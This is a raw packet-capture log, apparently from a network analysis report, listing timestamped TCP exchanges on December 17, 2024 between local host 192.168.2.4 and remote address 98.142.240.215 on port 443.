                                                                                                                                                                              Dec 17, 2024 18:12:58.571281910 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.574553967 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.574625015 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.577536106 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.577606916 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.581621885 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.581717014 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.584798098 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.584866047 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.588237047 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.588293076 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.591406107 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.591584921 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.595458984 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.595524073 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.598921061 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.598984957 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.602107048 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.602206945 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.605863094 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.605933905 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.608964920 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.609034061 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.613081932 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.613147020 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.616230011 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.616282940 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.616324902 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.649051905 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.649118900 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.652055979 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.652127981 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.763389111 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.763509035 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.766227007 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.766319036 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.769531012 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.769598007 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.772847891 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.772942066 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.776817083 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.776949883 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.779969931 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.780107021 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.783365965 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.783440113 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.786525965 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.786638975 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.790635109 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.790740967 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.793812990 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.793884993 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.797523022 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.797637939 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.800966978 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.801069021 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.804150105 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.804227114 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.808264017 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.808342934 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.811420918 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.811482906 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.842871904 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.842992067 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.846311092 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.846400976 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.957369089 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.957470894 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.960709095 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.960800886 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.963962078 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.964054108 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.967981100 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.968060970 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.971177101 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.971263885 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.974543095 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.974639893 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.978625059 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.978697062 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.981859922 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.981930017 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.985208035 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.985316992 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.988538980 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.988607883 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.992129087 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.992196083 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.995321035 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.995405912 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.999402046 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.999473095 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.002618074 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.002691984 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.034169912 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.034241915 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.037488937 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.037553072 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.150856018 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.151005983 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.154131889 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.154259920 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.157299995 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.157394886 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.161355019 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.161467075 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.164582968 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.164669991 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.167912960 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.167995930 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.171113014 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.171190977 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.175282955 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.175386906 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.178385019 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.178467035 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.181822062 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.181905985 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.185517073 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.185633898 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.188822985 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.188913107 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.192763090 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.192850113 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.195986032 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.196104050 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.234853029 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.234962940 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.237330914 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.237427950 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.345709085 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.345784903 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.348450899 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.348510981 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.351794004 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.351850986 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.355073929 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.355189085 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.359334946 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.359469891 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.362284899 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.362348080 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.365674973 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.365753889 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.368834019 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.368917942 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.372904062 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.372988939 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.376115084 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.376193047 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.379899979 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.379976988 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.383040905 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.383135080 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.386446953 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.386533022 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.390535116 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.390644073 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.393671036 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.393742085 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.433686018 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.433816910 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.437712908 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.437799931 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.563770056 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.563883066 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.567013025 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.567126036 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.570346117 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.570427895 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.573450089 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.573556900 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.577558041 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.577647924 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.580929041 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.581017017 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.584152937 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.584259987 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.588193893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.588295937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.591423035 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.591510057 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.594997883 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.595141888 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.598368883 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.598458052 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.601994991 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.602237940 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.605171919 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.605276108 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.608978987 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.609070063 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.643040895 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.643137932 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.646152020 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.646255970 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.759033918 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.759130955 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.762100935 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.762171030 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.766206026 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.766267061 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.769345045 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.769433975 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.772742033 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.772810936 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.775953054 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.776045084 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.780035973 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.780117035 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.783552885 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.783637047 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.786597967 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.786695957 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.790695906 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.790780067 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.793711901 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.793792009 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.797707081 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.797822952 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.800821066 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.800899029 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.804172039 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.804245949 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.834878922 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.834991932 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.837481976 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.837558985 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.950949907 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.951035976 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.953485012 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.953623056 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.956907034 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.956995010 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.960010052 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.960084915 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.964128971 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.964214087 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.967327118 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.967391014 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.970721960 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.970791101 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.974762917 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.974833965 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.977947950 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.978032112 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.981384039 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.981446981 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.984983921 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.985080004 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.988267899 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.988348961 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.991471052 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.991549015 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.995547056 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.995660067 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:59.998744011 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:59.998831987 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.029956102 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.030046940 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.033345938 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.033421993 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.168108940 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.168375969 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.171034098 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.171122074 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.174128056 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.174209118 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.178181887 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.178270102 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.183057070 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.183161974 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.331702948 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331780910 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331829071 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.331851959 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331890106 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331893921 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.331926107 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.331931114 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331959009 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.331967115 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332012892 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332015991 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332024097 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332077026 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332077980 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332088947 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332137108 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332149029 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332206011 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332211971 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332216978 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332247019 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332267046 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332272053 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332293034 CET49738443192.168.2.498.142.240.215
